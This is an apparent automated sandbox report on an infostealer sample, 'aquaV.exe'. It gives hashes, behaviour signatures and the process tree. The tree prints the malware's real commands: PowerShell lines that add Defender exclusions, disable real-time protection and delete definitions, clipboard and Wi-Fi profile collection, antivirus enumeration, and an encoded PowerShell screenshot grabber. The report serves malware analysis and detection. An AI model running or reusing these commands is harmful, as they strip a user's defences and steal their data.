Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26-07-2024 12:57
Behavioral task
behavioral1
Sample
aquaV.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
aquaV.exe
Resource
win10v2004-20240709-en
General
-
Target
aquaV.exe
-
Size
7.4MB
-
MD5
49aa048767303db8685115ce421fa3ec
-
SHA1
259179216bae1ce03d880549f25de447324cf589
-
SHA256
2dc86fd9e7b5746036284768f475ea9c3268c8bfc6cd4001f9a27bb923028467
-
SHA512
f2b28a672ead669a7a133d253dfc142952055ad1579bd762a0cb75c281d79b524d30cb489d6bc7643191bce2cad1b150f47a9a632c8b804358cddee8bd6e1d1b
-
SSDEEP
98304:2JSi8x9XQsTurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EAKhOC112j:2QP9VTurErvI9pWjgfPvzm6gsFE14A0
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1672 powershell.exe 1712 powershell.exe 2840 powershell.exe 3988 powershell.exe 3808 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 3720 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
aquaV.exepid process 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe 448 aquaV.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI39402\python311.dll upx behavioral2/memory/448-25-0x00007FF8B41A0000-0x00007FF8B4792000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\select.pyd upx behavioral2/memory/448-32-0x00007FF8C8C50000-0x00007FF8C8C5F000-memory.dmp upx behavioral2/memory/448-31-0x00007FF8C4090000-0x00007FF8C40B4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI39402\libcrypto-3.dll upx behavioral2/memory/448-54-0x00007FF8C3FB0000-0x00007FF8C3FDD000-memory.dmp upx behavioral2/memory/448-58-0x00007FF8C3DB0000-0x00007FF8C3DD3000-memory.dmp upx behavioral2/memory/448-57-0x00007FF8C4030000-0x00007FF8C4049000-memory.dmp upx behavioral2/memory/448-60-0x00007FF8B4020000-0x00007FF8B419E000-memory.dmp upx behavioral2/memory/448-62-0x00007FF8C3C50000-0x00007FF8C3C69000-memory.dmp upx behavioral2/memory/448-64-0x00007FF8C3D80000-0x00007FF8C3D8D000-memory.dmp upx behavioral2/memory/448-71-0x00007FF8B3D60000-0x00007FF8B3E2D000-memory.dmp upx behavioral2/memory/448-73-0x00007FF8C4090000-0x00007FF8C40B4000-memory.dmp upx behavioral2/memory/448-72-0x00007FF8B3830000-0x00007FF8B3D59000-memory.dmp upx behavioral2/memory/448-76-0x00007FF8C39B0000-0x00007FF8C39C4000-memory.dmp upx behavioral2/memory/448-83-0x00007FF8B3710000-0x00007FF8B382C000-memory.dmp upx behavioral2/memory/448-82-0x00007FF8C39A0000-0x00007FF8C39AD000-memory.dmp upx behavioral2/memory/448-70-0x00007FF8C39D0000-0x00007FF8C3A03000-memory.dmp upx behavioral2/memory/448-69-0x00007FF8B41A0000-0x00007FF8B4792000-memory.dmp upx behavioral2/memory/448-327-0x00007FF8B3D60000-0x00007FF8B3E2D000-memory.dmp upx behavioral2/memory/448-332-0x00007FF8C3DB0000-0x00007FF8C3DD3000-memory.dmp upx behavioral2/memory/448-331-0x00007FF8B3710000-0x00007FF8B382C000-memory.dmp upx behavioral2/memory/448-326-0x00007FF8C39D0000-0x00007FF8C3A03000-memory.dmp upx behavioral2/memory/448-324-0x00007FF8C3C50000-0x00007FF8C3C69000-memory.dmp upx behavioral2/memory/448-323-0x00007FF8B4020000-0x00007FF8B419E000-memory.dmp upx behavioral2/memory/448-318-0x00007FF8C4090000-0x00007FF8C40B4000-memory.dmp upx behavioral2/memory/448-317-0x00007FF8B41A0000-0x00007FF8B4792000-memory.dmp upx behavioral2/memory/448-328-0x00007FF8B3830000-0x00007FF8B3D59000-memory.dmp upx behavioral2/memory/448-333-0x00007FF8B41A0000-0x00007FF8B4792000-memory.dmp upx behavioral2/memory/448-359-0x00007FF8B3830000-0x00007FF8B3D59000-memory.dmp upx behavioral2/memory/448-361-0x00007FF8B3710000-0x00007FF8B382C000-memory.dmp upx behavioral2/memory/448-360-0x00007FF8C39A0000-0x00007FF8C39AD000-memory.dmp upx behavioral2/memory/448-358-0x00007FF8B3D60000-0x00007FF8B3E2D000-memory.dmp upx behavioral2/memory/448-357-0x00007FF8C39D0000-0x00007FF8C3A03000-memory.dmp upx behavioral2/memory/448-356-0x00007FF8C3D80000-0x00007FF8C3D8D000-memory.dmp upx behavioral2/memory/448-355-0x00007FF8C3C50000-0x00007FF8C3C69000-memory.dmp upx behavioral2/memory/448-354-0x00007FF8B4020000-0x00007FF8B419E000-memory.dmp upx behavioral2/memory/448-353-0x00007FF8C39B0000-0x00007FF8C39C4000-memory.dmp upx behavioral2/memory/448-352-0x00007FF8C4030000-0x00007FF8C4049000-memory.dmp upx behavioral2/memory/448-351-0x00007FF8C3FB0000-0x00007FF8C3FDD000-memory.dmp upx behavioral2/memory/448-350-0x00007FF8C4090000-0x00007FF8C40B4000-memory.dmp upx behavioral2/memory/448-349-0x00007FF8C8C50000-0x00007FF8C8C5F000-memory.dmp upx behavioral2/memory/448-348-0x00007FF8C3DB0000-0x00007FF8C3DD3000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 25 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 4132 tasklist.exe 3328 tasklist.exe 4308 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1672 powershell.exe 1672 powershell.exe 2840 powershell.exe 2840 powershell.exe 1712 powershell.exe 1712 powershell.exe 3920 powershell.exe 3920 powershell.exe 2964 powershell.exe 2964 powershell.exe 2840 powershell.exe 2840 powershell.exe 3920 powershell.exe 1712 powershell.exe 2964 powershell.exe 3988 powershell.exe 3988 powershell.exe 3988 powershell.exe 4528 powershell.exe 4528 powershell.exe 3808 powershell.exe 3808 powershell.exe 4928 powershell.exe 4928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetasklist.exepowershell.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 4132 tasklist.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 3328 tasklist.exe Token: SeIncreaseQuotaPrivilege 1412 WMIC.exe Token: SeSecurityPrivilege 1412 WMIC.exe Token: SeTakeOwnershipPrivilege 1412 WMIC.exe Token: SeLoadDriverPrivilege 1412 WMIC.exe Token: SeSystemProfilePrivilege 1412 WMIC.exe Token: SeSystemtimePrivilege 1412 WMIC.exe Token: SeProfSingleProcessPrivilege 1412 WMIC.exe Token: SeIncBasePriorityPrivilege 1412 WMIC.exe Token: SeCreatePagefilePrivilege 1412 WMIC.exe Token: SeBackupPrivilege 1412 WMIC.exe Token: SeRestorePrivilege 1412 WMIC.exe Token: SeShutdownPrivilege 1412 WMIC.exe Token: SeDebugPrivilege 1412 WMIC.exe Token: SeSystemEnvironmentPrivilege 1412 WMIC.exe Token: SeRemoteShutdownPrivilege 1412 WMIC.exe Token: SeUndockPrivilege 1412 WMIC.exe Token: SeManageVolumePrivilege 1412 WMIC.exe Token: 33 1412 WMIC.exe Token: 34 1412 WMIC.exe Token: 35 1412 WMIC.exe Token: 36 1412 WMIC.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 4308 tasklist.exe Token: SeIncreaseQuotaPrivilege 1412 WMIC.exe Token: SeSecurityPrivilege 1412 WMIC.exe Token: SeTakeOwnershipPrivilege 1412 WMIC.exe Token: SeLoadDriverPrivilege 1412 WMIC.exe Token: SeSystemProfilePrivilege 1412 WMIC.exe Token: SeSystemtimePrivilege 1412 WMIC.exe Token: SeProfSingleProcessPrivilege 1412 WMIC.exe Token: SeIncBasePriorityPrivilege 1412 WMIC.exe Token: SeCreatePagefilePrivilege 1412 WMIC.exe Token: SeBackupPrivilege 1412 WMIC.exe Token: SeRestorePrivilege 1412 WMIC.exe Token: SeShutdownPrivilege 1412 WMIC.exe Token: SeDebugPrivilege 1412 WMIC.exe Token: SeSystemEnvironmentPrivilege 1412 WMIC.exe Token: SeRemoteShutdownPrivilege 1412 WMIC.exe Token: SeUndockPrivilege 1412 WMIC.exe Token: SeManageVolumePrivilege 1412 WMIC.exe Token: 33 1412 WMIC.exe Token: 34 1412 WMIC.exe Token: 35 1412 WMIC.exe Token: 36 1412 WMIC.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeIncreaseQuotaPrivilege 1212 WMIC.exe Token: SeSecurityPrivilege 1212 WMIC.exe Token: SeTakeOwnershipPrivilege 1212 WMIC.exe Token: SeLoadDriverPrivilege 1212 WMIC.exe Token: SeSystemProfilePrivilege 1212 WMIC.exe Token: SeSystemtimePrivilege 1212 WMIC.exe Token: SeProfSingleProcessPrivilege 1212 WMIC.exe Token: SeIncBasePriorityPrivilege 1212 WMIC.exe Token: SeCreatePagefilePrivilege 1212 WMIC.exe Token: SeBackupPrivilege 1212 WMIC.exe Token: SeRestorePrivilege 1212 WMIC.exe Token: SeShutdownPrivilege 1212 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aquaV.exeaquaV.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3940 wrote to memory of 448 3940 aquaV.exe aquaV.exe PID 3940 wrote to memory of 448 3940 aquaV.exe aquaV.exe PID 448 wrote to memory of 212 448 aquaV.exe cmd.exe PID 448 wrote to memory of 212 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2576 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2576 448 aquaV.exe cmd.exe PID 448 wrote to memory of 4916 448 aquaV.exe cmd.exe PID 448 wrote to memory of 4916 448 aquaV.exe cmd.exe PID 448 wrote to memory of 4112 448 aquaV.exe cmd.exe PID 448 wrote to memory of 4112 448 aquaV.exe cmd.exe PID 212 wrote to memory of 1672 212 cmd.exe powershell.exe PID 212 wrote to memory of 1672 212 cmd.exe powershell.exe PID 448 wrote to memory of 2328 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2328 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3016 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3016 448 aquaV.exe cmd.exe PID 2576 wrote to memory of 2840 2576 cmd.exe powershell.exe PID 2576 wrote to memory of 2840 2576 cmd.exe powershell.exe PID 448 wrote to memory of 1920 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1920 448 aquaV.exe cmd.exe PID 2328 wrote to memory of 4132 2328 cmd.exe tasklist.exe PID 2328 wrote to memory of 4132 2328 cmd.exe tasklist.exe PID 448 wrote to memory of 1796 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1796 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3956 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3956 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2636 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2636 448 aquaV.exe cmd.exe PID 3016 wrote to memory of 3328 3016 cmd.exe tasklist.exe PID 3016 wrote to memory of 3328 3016 cmd.exe tasklist.exe PID 4916 wrote to memory of 4380 4916 cmd.exe mshta.exe PID 4916 wrote to memory of 4380 4916 cmd.exe mshta.exe PID 4112 wrote to memory of 1712 4112 cmd.exe powershell.exe PID 4112 wrote to memory of 1712 4112 cmd.exe powershell.exe PID 448 wrote to memory of 2720 448 aquaV.exe cmd.exe PID 448 wrote to memory of 2720 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1020 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1020 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1324 448 aquaV.exe cmd.exe PID 448 wrote to memory of 1324 448 aquaV.exe cmd.exe PID 1920 wrote to memory of 1412 1920 cmd.exe WMIC.exe PID 1920 wrote to memory of 1412 1920 cmd.exe WMIC.exe PID 3956 wrote to memory of 3920 3956 cmd.exe powershell.exe PID 3956 wrote to memory of 3920 3956 cmd.exe powershell.exe PID 1796 wrote to memory of 4308 1796 cmd.exe tree.com PID 1796 wrote to memory of 4308 1796 cmd.exe tree.com PID 2636 wrote to memory of 4860 2636 cmd.exe tree.com PID 2636 wrote to memory of 4860 2636 cmd.exe tree.com PID 1020 wrote to memory of 4080 1020 cmd.exe systeminfo.exe PID 1020 wrote to memory of 4080 1020 cmd.exe systeminfo.exe PID 1324 wrote to memory of 2964 1324 cmd.exe powershell.exe PID 1324 wrote to memory of 2964 1324 cmd.exe powershell.exe PID 2720 wrote to memory of 3480 2720 cmd.exe netsh.exe PID 2720 wrote to memory of 3480 2720 cmd.exe netsh.exe PID 448 wrote to memory of 3840 448 aquaV.exe WaaSMedicAgent.exe PID 448 wrote to memory of 3840 448 aquaV.exe WaaSMedicAgent.exe PID 3840 wrote to memory of 2068 3840 cmd.exe tree.com PID 3840 wrote to memory of 2068 3840 cmd.exe tree.com PID 448 wrote to memory of 4628 448 aquaV.exe cmd.exe PID 448 wrote to memory of 4628 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3844 448 aquaV.exe cmd.exe PID 448 wrote to memory of 3844 448 aquaV.exe cmd.exe PID 4628 wrote to memory of 2192 4628 cmd.exe tree.com PID 4628 wrote to memory of 2192 4628 cmd.exe tree.com
Processes
-
C:\Users\Admin\AppData\Local\Temp\aquaV.exe"C:\Users\Admin\AppData\Local\Temp\aquaV.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\aquaV.exe"C:\Users\Admin\AppData\Local\Temp\aquaV.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aquaV.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\aquaV.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('SERVERS DOWN!', 0, 'error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('SERVERS DOWN!', 0, 'error', 0+16);close()"4⤵PID:4380
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4860
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4080 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
